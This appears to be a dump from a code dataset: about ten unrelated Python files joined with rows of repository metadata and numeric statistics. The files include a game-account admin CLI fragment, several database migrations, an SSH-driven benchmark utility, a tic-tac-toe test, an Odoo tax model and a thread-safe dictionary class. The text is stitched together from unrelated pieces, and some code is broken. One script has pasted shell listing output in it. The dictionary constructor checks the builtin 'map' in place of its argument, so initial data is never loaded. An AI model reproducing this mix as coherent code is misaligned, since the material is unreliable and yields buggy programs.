subparser.set_defaults(func=pa_service_api.command_edit_player)
subparser = player_account_subparsers.add_parser('remove-player-ban', help='Remove a player ban')
subparser.add_argument('--account-id', type=str, required=True, help='The account id to restore')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_remove_player_ban)
subparser = player_account_subparsers.add_parser('reset-player-password', help='Reset a player password')
subparser.add_argument('--username', type=str, required=True, help='The cognito username of the account to target')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_reset_player_password)
subparser = player_account_subparsers.add_parser('show-banned-players', help='List banned players in the Gem')
subparser.add_argument('--page-token', type=str, required=False, default=None, help='The pagination token to get the next page.')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_list_banned_players)
subparser = player_account_subparsers.add_parser('show-players', help='List registered players in the Gem')
subparser.add_argument('--filter-type', type=str, required=False, choices=pa_service_api.SEARCH_FILTER_CHOICES, help='The type of filter to apply')
subparser.add_argument('--filter-value', type=str, required=False, help='The value for the filter as a string. '
'For example the email address for the CognitoEmail filter.')
subparser.add_argument('--page-token', type=str, required=False, default=None, help='The pagination token to get the next page.')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_list_players)
subparser = player_account_subparsers.add_parser('show-player-details', help='Show details about a player')
subparser.add_argument('--account-id', type=str, required=True, help='The account id to show details for')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_list_player_details)
subparser = player_account_subparsers.add_parser('show-logs', help='Show recent log events for ServiceLambda')
subparser.add_argument('--minutes', type=int, required=False, help='How far back from now to attempt to display. Default is 10mins')
add_common_args(subparser)
subparser.set_defaults(func=pa_service_api.command_show_log_events)
| 69.920455 | 151 | 0.759142 | 855 | 6,153 | 5.281871 | 0.187135 | 0.071745 | 0.115146 | 0.075288 | 0.680027 | 0.674934 | 0.648804 | 0.54473 | 0.513065 | 0.513065 | 0 | 0.00056 | 0.12888 | 6,153 | 87 | 152 | 70.724138 | 0.841791 | 0.084187 | 0 | 0.349206 | 0 | 0 | 0.293008 | 0.007472 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.031746 | 0.031746 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ea65fbf958336b9e959399af4a9e0239eaa9b41 | 610 | py | Python | tests/migrations/0014_auto_20200327_1152.py | intellineers/django-bridger | ed097984a99df7da40a4d01bd00c56e3c6083056 | [
"BSD-3-Clause"
] | 2 | 2020-03-17T00:53:23.000Z | 2020-07-16T07:00:33.000Z | tests/migrations/0014_auto_20200327_1152.py | intellineers/django-bridger | ed097984a99df7da40a4d01bd00c56e3c6083056 | [
"BSD-3-Clause"
] | 76 | 2019-12-05T01:15:57.000Z | 2021-09-07T16:47:27.000Z | tests/migrations/0014_auto_20200327_1152.py | intellineers/django-bridger | ed097984a99df7da40a4d01bd00c56e3c6083056 | [
"BSD-3-Clause"
] | 1 | 2020-02-05T15:09:47.000Z | 2020-02-05T15:09:47.000Z | # Generated by Django 2.2.11 on 2020-03-27 10:52
import django_fsm
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("tests", "0013_auto_20200219_1324"),
]
operations = [
migrations.AlterField(
model_name="modeltest",
name="status_field",
field=django_fsm.FSMField(
choices=[("status1", "Status1"), ("status2", "Status2"), ("status3", "Status3"),],
default="status1",
max_length=50,
verbose_name="Status",
),
),
]
| 25.416667 | 98 | 0.545902 | 58 | 610 | 5.586207 | 0.706897 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099274 | 0.322951 | 610 | 23 | 99 | 26.521739 | 0.68523 | 0.07541 | 0 | 0.111111 | 1 | 0 | 0.185053 | 0.040925 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ecd3bb7ab30b57db2889871b443e252e1a7b759 | 979 | py | Python | PyScraper/server/models/project.py | nikan1996/PyScraper | ed6ba5aa490fce96b5ff59e1461b408886744c04 | [
"Apache-2.0"
] | null | null | null | PyScraper/server/models/project.py | nikan1996/PyScraper | ed6ba5aa490fce96b5ff59e1461b408886744c04 | [
"Apache-2.0"
] | 1 | 2018-05-31T19:08:40.000Z | 2018-05-31T19:08:40.000Z | PyScraper/server/models/project.py | nikan1996/PyScraper | ed6ba5aa490fce96b5ff59e1461b408886744c04 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
@author:nikan
@file: project.py
@time: 2018/5/14 下午4:20
"""
import datetime
from sqlalchemy import text
from sqlalchemy.dialects import mysql
from PyScraper.server.extensions import db
class Project(db.Model):
__tablename__ = "project"
project_id = db.Column(db.Integer, autoincrement=True, primary_key=True, doc="自增id")
project_name = db.Column(db.String(191), nullable=False, doc="项目名称")
setting = db.Column(mysql.JSON, doc="项目配置")
cron_config = db.Column(mysql.JSON, doc="项目调度配置")
tag = db.Column(db.String(191), doc="项目标签")
status = db.Column(db.String(191), nullable=False, default='stop', doc="项目状态")
is_deleted = db.Column(db.Boolean, default=0, doc="项目是否删除的标记")
update_timestamp = db.Column(db.TIMESTAMP, server_default=text('CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP'), doc="更新时间")
create_timestamp = db.Column(db.TIMESTAMP, default=datetime.datetime.now, doc="创建时间")
| 29.666667 | 128 | 0.716037 | 139 | 979 | 4.942446 | 0.517986 | 0.104803 | 0.101892 | 0.069869 | 0.260553 | 0.093159 | 0.093159 | 0 | 0 | 0 | 0 | 0.024823 | 0.135853 | 979 | 32 | 129 | 30.59375 | 0.787234 | 0.096016 | 0 | 0 | 0 | 0 | 0.113272 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.266667 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6ecf4658030d2902120f78e893a4f7cec04a779d | 1,935 | py | Python | refresh_dynspec_files.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | 2 | 2019-05-01T00:34:28.000Z | 2021-02-10T09:18:10.000Z | refresh_dynspec_files.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | null | null | null | refresh_dynspec_files.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | null | null | null | '''
refresh_dynspec_files.py
Purpose: Re-run the step of going from tbavg.ms to tbavg.ms.dynspec for all observations. This is
useful because I found a bug in dyn_spec (which reads the dynspec out of tbavg.ms) and so
want to redo just this step.
'''
import dynspec.ms2dynspec
reload(dynspec.ms2dynspec)
from dynspec.pipeline_utils import load_ds_filelist
from dynspec.ms2dynspec import tbavg2dsfile
ds_filelist = load_ds_filelist()
failed_list = []
for obs in ds_filelist:
obs_filelist = ds_filelist[obs]
for ds_file in obs_filelist:
tbavg_ms_file = ds_file[:-8]
if os.path.exists(tbavg_ms_file):
ds_file = tbavg2dsfile(tbavg_ms_file)
else:
print tbavg_ms_file, 'does not exist'
failed_list.append(tbavg_ms_file)
print 'Failed list:'
print failed_list
# failed on VLBA data (except for UVCet_3X...no it wasn't in ds_filelist) --> need to do those separately
# (although they shouldn't have much flagging so it shouldn't be as much of an issue)
# to do: find code used to create VLBA dynspecs in the first place
# find VLBA dynspecs
# write script to recreate VLBA dynspecs
ls -d /data/jrv/BV071/*/*/*tbavg.ms*
/data/jrv/BV071/ADLeo/3/ADLeo_3X.tbavg.ms /data/jrv/BV071/UVCet/3/UVCet_3X.tbavg.ms
/data/jrv/BV071/ADLeo/3/ADLeo_3X.tbavg.ms.dynspec /data/jrv/BV071/UVCet/3/UVCet_3X.tbavg.ms.dynspec
/data/jrv/BV071/ADLeo/4/ADLeo_4X.tbavg.ms /data/jrv/BV071/UVCet/4/UVCet_4X.tbavg.ms
/data/jrv/BV071/ADLeo/4/ADLeo_4X.tbavg.ms.dynspec /data/jrv/BV071/UVCet/4/UVCet_4X.tbavg.ms.dynspec
/data/jrv/BV071/ADLeo/5/ADLeo_5X.tbavg.ms /data/jrv/BV071/UVCet/5/UVCet_5X.tbavg.ms
/data/jrv/BV071/ADLeo/5/ADLeo_5X.tbavg.ms.dynspec /data/jrv/BV071/UVCet/5/UVCet_5X.tbavg.ms.dynspec
# Conclusion: I want to use selfcal'd versions of the data sets for dynspecs anyways, so don't worry about re-creating these dynspecs for the moment.
| 43.977273 | 149 | 0.737468 | 336 | 1,935 | 4.119048 | 0.348214 | 0.106214 | 0.112717 | 0.070809 | 0.33237 | 0.307803 | 0.307803 | 0.282514 | 0.282514 | 0.056358 | 0 | 0.043103 | 0.160724 | 1,935 | 43 | 150 | 45 | 0.809113 | 0.236693 | 0 | 0 | 0 | 0 | 0.021649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.125 | null | null | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ee361e0cf18f478933ff52e050ff7fb2712439d | 823 | py | Python | model/test_game.py | AndreasHae/tictactoe-py | 7c6d67474793a9f19f5797eaa8386e4b2c2eebf3 | [
"MIT"
] | 1 | 2018-03-18T22:51:29.000Z | 2018-03-18T22:51:29.000Z | model/test_game.py | AndreasHae/tictactoe-py | 7c6d67474793a9f19f5797eaa8386e4b2c2eebf3 | [
"MIT"
] | 2 | 2018-03-18T22:58:03.000Z | 2018-03-19T10:39:33.000Z | model/test_game.py | AndreasHae/tictactoe-py | 7c6d67474793a9f19f5797eaa8386e4b2c2eebf3 | [
"MIT"
] | null | null | null | import unittest
from model.game import Game
class GameTest(unittest.TestCase):
def setUp(self):
self.game = Game()
def test_next_player(self):
first_player = self.game.next_player
self.game.turn(0, 0)
second_player = self.game.next_player
self.game.turn(1, 0)
self.assertEqual(first_player, self.game.next_player)
self.game.turn(0, 1)
self.assertEqual(second_player, self.game.next_player)
def test_turn_input_checked(self):
with self.assertRaises(AssertionError):
self.game.turn(-1, -1)
with self.assertRaises(AssertionError):
self.game.turn(3, 3)
def test_turn_cell_occupied(self):
self.game.turn(0, 0)
with self.assertRaises(AssertionError):
self.game.turn(0, 0)
| 25.71875 | 62 | 0.64277 | 109 | 823 | 4.706422 | 0.256881 | 0.187135 | 0.191033 | 0.140351 | 0.606238 | 0.573099 | 0.502924 | 0.233918 | 0.163743 | 0.163743 | 0 | 0.02269 | 0.250304 | 823 | 31 | 63 | 26.548387 | 0.808752 | 0 | 0 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42bf541386207b87a028f4682fdc2f2b583c0fb0 | 8,805 | py | Python | Util.py | a523/obscmdbench | 109f83d42f7e266d6205bac3f13c210502ed86f4 | [
"Apache-2.0"
] | 27 | 2018-01-23T09:23:03.000Z | 2021-08-09T19:01:42.000Z | Util.py | a523/obscmdbench | 109f83d42f7e266d6205bac3f13c210502ed86f4 | [
"Apache-2.0"
] | 3 | 2019-06-23T07:30:21.000Z | 2020-08-04T08:58:19.000Z | Util.py | a523/obscmdbench | 109f83d42f7e266d6205bac3f13c210502ed86f4 | [
"Apache-2.0"
] | 8 | 2018-09-20T10:08:39.000Z | 2021-09-14T07:33:37.000Z | # -*- coding:utf-8 -*-
import random
import string
import base64
import hmac
import hashlib
import logging
import sys
import time
import os
TIME_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'
ISO8601 = '%Y%m%dT%H%M%SZ'
ISO8601_MS = '%Y-%m-%dT%H:%M:%S.%fZ'
RFC1123 = '%a, %d %b %Y %H:%M:%S %Z'
class InitSSHRemoteHost:
def __init__(self, ip, username, password, tools_path, tool_number):
self.localIP = ip
self.username = username
self.password = password
self.tools_path = tools_path
self.tool_number = tool_number
def random_string_create(string_length):
if isinstance(string_length, int):
return ''.join(
[random.choice(string.ascii_letters + string.digits + string.punctuation.translate(None, '!,%&<>\'\\^`')) for n in
range(string_length)])
else:
print 'input error'
def generate_image_format(image_format):
"""
生成图片转码格式
:param image_format:
:return:
"""
if str(image_format).find(',') != -1:
format_array = image_format.split(',')
return format_array[random.randint(0, len(format_array) - 1)]
return image_format
def generate_a_size(data_size_str):
"""
返回对象大小,和是否是固定值,可必免反复请求。ifFixed = True
:param data_size_str:
:return:
"""
if str(data_size_str).find('~') != -1 and str(data_size_str).find(',') != -1:
size_array = data_size_str.split(',')
size_chosen = size_array[random.randint(0, len(size_array) - 1)]
start_size = int(size_chosen.split('~')[0])
end_size = int(size_chosen.split('~')[1])
return random.randint(start_size, end_size), False
elif str(data_size_str).find('~') != -1:
start_size = int(data_size_str.split('~')[0])
end_size = int(data_size_str.split('~')[1])
return random.randint(start_size, end_size), False
elif str(data_size_str).find(',') != -1:
size_array = data_size_str.split(',')
return int(size_array[random.randint(0, len(size_array) - 1)]), False
else:
return int(data_size_str), True
def get_utf8_value(value):
if not value:
return ''
if isinstance(value, str):
return value
if isinstance(value, unicode):
return value.encode('utf-8')
return str(value)
def compare_version(v1, v2):
v1 = v1.split('.')
v2 = v2.split('.')
try:
for i in range(0, len(v1)):
if len(v2) < i + 1:
return 1
elif int(v1[i]) < int(v2[i]):
return -1
elif int(v1[i]) > int(v2[i]):
return 1
except:
return -1
if len(v2) > len(v1):
return -1
return 0
def generate_config_file(config_file):
"""
generate specific configuration file
:param config_file:
:return: config generated
"""
config = {}
try:
f = open(config_file, 'r')
lines = f.readlines()
for line in lines:
line = line.strip()
if line and line[0] != '#':
config[line[:line.find('=')].strip()] = line[line.find('=') + 1:].strip()
else:
continue
f.close()
except Exception, e:
print '[ERROR] Read config file %s error: %s' % (config_file, e)
sys.exit()
return config
def read_distribute_config(config_file='distribute_config.dat'):
"""
read given distribute file configuration
:param config_file:
:return:
"""
config = generate_config_file(config_file)
config['Slaves'] = config['Slaves'].replace(' ', '').replace(',,', ',')
config['Usernames'] = config['Usernames'].replace(' ', '').replace(',,', ',')
config['Passwords'] = config['Passwords'].replace(' ', '').replace(',,', ',')
config['Toolpaths'] = config['Toolpaths'].replace(' ', '').replace(',,', ',')
config['ToolNumberPerServer'] = config['ToolNumberPerServer'].replace(' ', '').replace(',,', ',')
if config['Master'] is not None and config['Master'] and \
config['Slaves'] is not None and config['Slaves'] and \
config['Usernames'] is not None and config['Usernames'] and \
config['Passwords'] is not None and config['Passwords'] and \
config['Toolpaths'] is not None and config['Toolpaths'] and \
config['ToolNumberPerServer'] is not None and config['ToolNumberPerServer'] and \
config['RunTime'] is not None and config['RunTime']:
pass
else:
raise Exception('Some config(s) is missed')
return config
def generate_slave_servers(config):
"""
initialize slave servers
:param config: distribute configuration
:return: generated slave servers
"""
slaves = []
slave_ips = config['Slaves'].split(',')
slave_usernames = config['Usernames'].split(',')
slave_passwords = config['Passwords'].split(',')
slave_tool_paths = config['Toolpaths'].split(',')
slave_tool_numbers = config['ToolNumberPerServer'].split(',')
k = 0
for i in xrange(len(slave_ips)):
for j in xrange(int(slave_tool_numbers[i])):
ip = slave_ips[i]
username = slave_usernames[i] if len(slave_usernames) > 1 else slave_usernames[0]
password = slave_passwords[i] if len(slave_passwords) > 1 else slave_passwords[0]
tool_path = slave_tool_paths[k]
k += 1
tool_number = "1"
slaves.append(InitSSHRemoteHost(ip, username, password, tool_path, tool_number))
return slaves
def generate_connections(servers):
"""
generate provided servers' connections
:param servers:
:return:
"""
from long_ssh_connection import LongSSHConnection
connects = []
for server in servers:
connect = LongSSHConnection(server)
# build the connection to provided server
logging.debug("Build connection to server[%s]" % server.localIP)
r = connect.execute_cmd('ssh %s@%s' % (server.username, server.localIP), timeout=10)
if r.endswith('?'):
connect.execute_cmd('yes', expect_end=':')
connect.execute_cmd(server.password, expect_end='#')
logging.debug("Successfully built the connection to server[%s]" % server.localIP)
# go to provided tool path
logging.debug("Go to provided tool path[%s] of server[%s]" % (server.tools_path, server.localIP))
connect.execute_cmd('cd %s' % server.tools_path, timeout=5)
connects.append(connect)
return connects
def get_brief_file_name(connect):
"""
get brief file name
:param connect:
:return:
"""
logging.warn("try to get brief file from server: %s" % connect.ip)
get_slave_brief_file_name_result = connect.execute_cmd(r"ls -t result/*_brief.txt | head -1")
tmp = get_slave_brief_file_name_result.split('\r\n')[0]
return tmp.split('/')[1]
def start_tool(connect, test_case, run_time):
"""
start tool in server
:param connect:
:param test_case:
:param run_time:
:return:
"""
print "Start at %s, send run signal to slave[%s]" % (time.strftime('%X %x %Z'), connect.ip)
logging.warn("send run signal to server %s" % connect.ip)
connect.execute_cmd('python run.py %s' % test_case, timeout=10)
def convert_time_format_str(time_sec):
if time_sec < 0:
return '--\'--\'--'
if time_sec >= 8553600:
return '>99 days'
elif time_sec >= 86400:
return '%2.2d Days %2.2d\'%2.2d\'%2.2d' % (
time_sec / (3600 * 24), time_sec % (3600 * 24) / 3600, (time_sec % 3600 / 60), (time_sec % 60))
else:
ms = time_sec - int('%2.2d' % (time_sec % 60))
return '%2.2d\'%2.2d\'%2.2d.%d' % (time_sec / 3600, (time_sec % 3600 / 60), (time_sec % 60), ms * 1000)
def generate_response(response):
"""
response of server always contains "\r\n", need to remove it
:param response: response of server
:return:
"""
if response is not None:
resp = response.split('\r\n')
resp = resp[0]
return resp
else:
raise Exception("response of server is none, please confirm it.")
def convert_to_size_str(size_bt):
kb = 2 ** 10
mb = 2 ** 20
gb = 2 ** 30
tb = 2 ** 40
pb = 2 ** 50
if size_bt >= 100 * pb:
return '>100 PB'
elif size_bt >= pb:
return "%.2f PB" % (size_bt / (pb * 1.0))
elif size_bt >= tb:
return "%.2f TB" % (size_bt / (tb * 1.0))
elif size_bt >= gb:
return "%.2f GB" % (size_bt / (gb * 1.0))
elif size_bt >= mb:
return "%.2f MB" % (size_bt / (mb * 1.0))
elif size_bt >= kb:
return "%.2f KB" % (size_bt / (kb * 1.0))
else:
return "%.2f B" % size_bt
| 31.33452 | 126 | 0.588756 | 1,139 | 8,805 | 4.395961 | 0.197542 | 0.023367 | 0.024166 | 0.016777 | 0.199521 | 0.118634 | 0.079489 | 0.076693 | 0.066307 | 0.051927 | 0 | 0.028004 | 0.261897 | 8,805 | 280 | 127 | 31.446429 | 0.742422 | 0.009654 | 0 | 0.107527 | 0 | 0.026882 | 0.124968 | 0.005361 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.048387 | 0.053763 | null | null | 0.016129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42c17cddde41c241e9967ce5584459dfad76abef | 712 | py | Python | children/migrations/0002_remove_child_ssn.py | City-of-Helsinki/kukkuu | 61f26bc622928fd04f6a397f832aaffff789e806 | [
"MIT"
] | null | null | null | children/migrations/0002_remove_child_ssn.py | City-of-Helsinki/kukkuu | 61f26bc622928fd04f6a397f832aaffff789e806 | [
"MIT"
] | 157 | 2019-10-08T07:58:59.000Z | 2022-03-20T23:00:17.000Z | children/migrations/0002_remove_child_ssn.py | City-of-Helsinki/kukkuu | 61f26bc622928fd04f6a397f832aaffff789e806 | [
"MIT"
] | 3 | 2019-10-07T12:06:26.000Z | 2022-01-25T14:03:14.000Z | # Generated by Django 2.2.6 on 2019-10-15 19:17
import uuid
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("children", "0001_initial")]
operations = [
migrations.RenameField(model_name="child", old_name="uuid", new_name="id"),
migrations.RemoveField(model_name="child", name="social_security_number_hash"),
migrations.AlterField(
model_name="child",
name="id",
field=models.UUIDField(
default=uuid.uuid4,
editable=False,
primary_key=True,
serialize=False,
verbose_name="UUID",
),
),
]
| 27.384615 | 87 | 0.580056 | 73 | 712 | 5.506849 | 0.657534 | 0.067164 | 0.104478 | 0.089552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040486 | 0.30618 | 712 | 25 | 88 | 28.48 | 0.773279 | 0.063202 | 0 | 0.105263 | 1 | 0 | 0.111278 | 0.040602 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42cbb8fbdb320bf4ee51a234482e61d5920e2af6 | 532 | py | Python | Task/Variadic-function/Python/variadic-function-4.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 5 | 2021-01-29T20:08:05.000Z | 2022-03-22T06:16:05.000Z | Task/Variadic-function/Python/variadic-function-4.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/Variadic-function/Python/variadic-function-4.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2021-04-13T04:19:31.000Z | 2021-04-13T04:19:31.000Z | >>> def printargs(*positionalargs, **keywordargs):
print "POSITIONAL ARGS:\n " + "\n ".join(repr(x) for x in positionalargs)
print "KEYWORD ARGS:\n " + '\n '.join(
"%r = %r" % (k,v) for k,v in keywordargs.iteritems())
>>> printargs(1,'a',1+0j, fee='fi', fo='fum')
POSITIONAL ARGS:
1
'a'
(1+0j)
KEYWORD ARGS:
'fee' = 'fi'
'fo' = 'fum'
>>> alist = [1,'a',1+0j]
>>> adict = {'fee':'fi', 'fo':'fum'}
>>> printargs(*alist, **adict)
POSITIONAL ARGS:
1
'a'
(1+0j)
KEYWORD ARGS:
'fee' = 'fi'
'fo' = 'fum'
>>>
| 20.461538 | 76 | 0.541353 | 78 | 532 | 3.692308 | 0.346154 | 0.027778 | 0.041667 | 0.069444 | 0.277778 | 0.277778 | 0.277778 | 0.277778 | 0.277778 | 0.277778 | 0 | 0.028103 | 0.197368 | 532 | 25 | 77 | 21.28 | 0.64637 | 0 | 0 | 0.521739 | 0 | 0 | 0.171053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.217391 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42ccf0a230dd6b60c0c66348fe16e98ae9ddaecc | 694 | py | Python | l10n_ar_ux/models/account_tax.py | odoo-mastercore/odoo-argentina | 58cdfe8610bae42f69ddb9d652a28eb3245f6a04 | [
"MIT"
] | 1 | 2021-01-25T15:57:58.000Z | 2021-01-25T15:57:58.000Z | l10n_ar_ux/models/account_tax.py | odoo-mastercore/odoo-argentina | 58cdfe8610bae42f69ddb9d652a28eb3245f6a04 | [
"MIT"
] | null | null | null | l10n_ar_ux/models/account_tax.py | odoo-mastercore/odoo-argentina | 58cdfe8610bae42f69ddb9d652a28eb3245f6a04 | [
"MIT"
] | 2 | 2020-10-17T16:36:02.000Z | 2021-01-24T10:20:05.000Z | ##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
from odoo import fields, models, api
class AccountTax(models.Model):
_inherit = 'account.tax'
jurisdiction_code = fields.Char(compute='_compute_jurisdiction_code')
@api.depends()
def _compute_jurisdiction_code(self):
for rec in self:
tag = rec.invoice_repartition_line_ids.tag_ids.filtered(
'jurisdiction_code')
rec.jurisdiction_code = tag[0].jurisdiction_code if tag else False
| 36.526316 | 78 | 0.54755 | 67 | 694 | 5.38806 | 0.641791 | 0.265928 | 0.127424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00173 | 0.167147 | 694 | 18 | 79 | 38.555556 | 0.622837 | 0.121037 | 0 | 0 | 0 | 0 | 0.119734 | 0.05765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42d46cca79d20f9f9b601039b1b942c9aa61ea97 | 1,074 | py | Python | migrations/versions/d09db0106be9_.py | CSCfi/pebbles | 24b32e8fc538cc8095fda62c892a8221346c2bce | [
"MIT"
] | 4 | 2017-05-11T14:50:32.000Z | 2020-01-10T09:02:27.000Z | migrations/versions/d09db0106be9_.py | CSCfi/pebbles | 24b32e8fc538cc8095fda62c892a8221346c2bce | [
"MIT"
] | 145 | 2017-04-07T11:01:58.000Z | 2019-12-11T15:30:23.000Z | migrations/versions/d09db0106be9_.py | CSCfi/pebbles | 24b32e8fc538cc8095fda62c892a8221346c2bce | [
"MIT"
] | 3 | 2017-10-25T12:36:16.000Z | 2018-04-26T08:49:34.000Z | """remove cost multipliers.
Revision ID: d09db0106be9
Revises: 7d8f697053e9
Create Date: 2016-11-14 15:12:37.972365
"""
# revision identifiers, used by Alembic.
revision = 'd09db0106be9'
down_revision = '7d8f697053e9'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('blueprints', 'maximum_lifetime')
op.drop_column('blueprints', 'cost_multiplier')
op.drop_column('blueprints', 'preallocated_credits')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('blueprints', sa.Column('preallocated_credits', sa.BOOLEAN(), autoincrement=False, nullable=True))
op.add_column('blueprints', sa.Column('cost_multiplier', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
op.add_column('blueprints', sa.Column('maximum_lifetime', sa.INTEGER(), autoincrement=False, nullable=True))
### end Alembic commands ###
| 34.645161 | 140 | 0.739292 | 127 | 1,074 | 6.141732 | 0.448819 | 0.123077 | 0.046154 | 0.084615 | 0.298718 | 0.298718 | 0.264103 | 0.264103 | 0.151282 | 0.151282 | 0 | 0.057754 | 0.129423 | 1,074 | 30 | 141 | 35.8 | 0.776471 | 0.281192 | 0 | 0 | 0 | 0 | 0.251691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.230769 | 0 | 0.384615 | 0.461538 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
42dc064cc7cda2989742a61dea5eea2492ed422d | 5,020 | py | Python | gosubl/utils.py | charlievieth/GoSubl | 07dec6a5fef09e4e1d686cfe5d586edcda003381 | [
"MIT"
] | null | null | null | gosubl/utils.py | charlievieth/GoSubl | 07dec6a5fef09e4e1d686cfe5d586edcda003381 | [
"MIT"
] | 1 | 2020-11-06T22:01:04.000Z | 2020-11-06T22:01:04.000Z | gosubl/utils.py | charlievieth/GoSubl | 07dec6a5fef09e4e1d686cfe5d586edcda003381 | [
"MIT"
] | null | null | null | try:
from collections.abc import MutableMapping
except ImportError:
from collections import MutableMapping
from threading import Lock
class Counter:
"""Counter provides a thread-safe counter."""
__slots__ = "_lock", "_value"
def __init__(self, value: int = 0) -> None:
self._lock = Lock()
self._value = value
def value(self) -> int:
with self._lock:
return self._value
def next(self) -> int:
with self._lock:
self._value += 1
return self._value
def __repr__(self) -> str:
return f"Counter(value={self.value()})"
class ThreadSafeDict(MutableMapping):
"""ThreadSafeDict provides a thread-safe dictionary"""
def __init__(self, initialdata=None, /, **kwargs):
self.mutex = Lock()
self.data = {}
if map is not None:
self.update(map)
if kwargs:
self.update(kwargs)
